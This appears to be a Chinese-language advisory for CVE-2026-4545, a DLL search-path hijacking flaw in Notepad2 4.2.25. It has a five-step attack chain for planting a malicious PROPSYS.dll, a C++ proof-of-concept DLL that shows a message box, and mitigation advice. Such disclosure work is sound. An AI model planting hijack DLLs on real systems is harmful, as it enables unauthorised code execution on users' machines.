CVE-2026-4545 Notepad2 非受控搜索路径漏洞

漏洞信息

漏洞编号

CVE-2026-4545

漏洞类型

非受控搜索路径

CVSS评分

7.0 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Flos Freeware Notepad2

漏洞概述

Flos Freeware Notepad2 4.2.25版本的PROPSYS.dll组件中存在非受控搜索路径漏洞。该漏洞允许具有本地访问权限的低权限攻击者通过操纵文件路径，诱使应用程序加载恶意组件。尽管攻击复杂度较高且需要本地环境，但一旦成功利用，将导致系统机密性、完整性和可用性的全面丧失。目前厂商尚未对此漏洞做出响应。

技术细节

该漏洞位于Flos Freeware Notepad2调用的PROPSYS.dll库中。其根本原因是应用程序在加载依赖库时，未指定完整的绝对路径，导致程序在启动或运行时，会按照Windows标准的DLL搜索顺序查找文件。攻击者若拥有本地系统的低权限账户（PR:L），可以将恶意的PROPSYS.dll文件放置在Notepad2的工作目录或系统搜索路径优先级较高的位置。当用户或系统启动Notepad2时，由于未受控的搜索路径机制，程序会优先加载攻击者植入的恶意DLL而非系统合法库。这将导致恶意代码在Notepad2的进程上下文中执行。根据CVSS向量（AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H），此攻击无需用户交互即可完成，且能造成高程度的机密性、完整性和可用性影响。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要在目标系统上拥有低权限的本地账户访问权限（PR:L）。

STEP 2

步骤2：识别利用路径

确定Notepad2的安装目录或其运行时的工作目录，确认其依赖PROPSYS.dll且存在搜索路径缺陷。

STEP 3

步骤3：植入恶意文件

将编译好的恶意PROPSYS.dll文件放置在Notepad2的工作目录或搜索路径优先级较高的位置。

STEP 4

步骤4：触发漏洞

等待或诱导用户启动Notepad2。程序启动时会自动搜索并加载恶意的PROPSYS.dll。

STEP 5

步骤5：执行恶意代码

恶意DLL代码在Notepad2进程上下文中运行，可能导致权限提升或系统破坏（C:H/I:H/A:H）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/**
 * PoC for CVE-2026-4545 - Uncontrolled Search Path in Notepad2
 * This code demonstrates how to create a malicious PROPSYS.dll
 * to be loaded by Notepad2 when placed in the same directory.
 * 
 * Compilation (Visual Studio Developer Command Prompt):
 * cl /LD malicious_propsys.cpp user32.lib
 */
#include <windows.h>

// Entry point for the DLL
BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // This code runs when the DLL is loaded into the process
        MessageBoxA(NULL, "CVE-2026-4545 PoC: Malicious PROPSYS.dll loaded successfully!", "Exploit", MB_OK | MB_ICONINFORMATION);
        
        // Example: Start a calculator or reverse shell
        // WinExec("calc.exe", SW_SHOW);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// Export dummy functions to match expected DLL structure if necessary
extern "C" __declspec(dllexport) void DummyFunction() {}

影响范围

Flos Freeware Notepad2 4.2.25

防御指南

临时缓解措施

在厂商发布修复补丁之前，建议用户限制对Notepad2程序目录及工作目录的写入权限，确保普通用户无法在这些目录下创建或替换文件。同时，应避免在不可信的目录中运行Notepad2程序。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4545
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4545
3 Details https://www.cvedetails.com/cve/CVE-2026-4545/
4 VulDB https://vuldb.com/cve/CVE-2026-4545
5 Link https://drive.google.com/file/d/1o3A3x47B2gi645H02-28qgoIgGN-g6rK/view
6 Link https://vuldb.com/?ctiid.352372
7 Link https://vuldb.com/?id.352372
8 Link https://vuldb.com/?submit.774752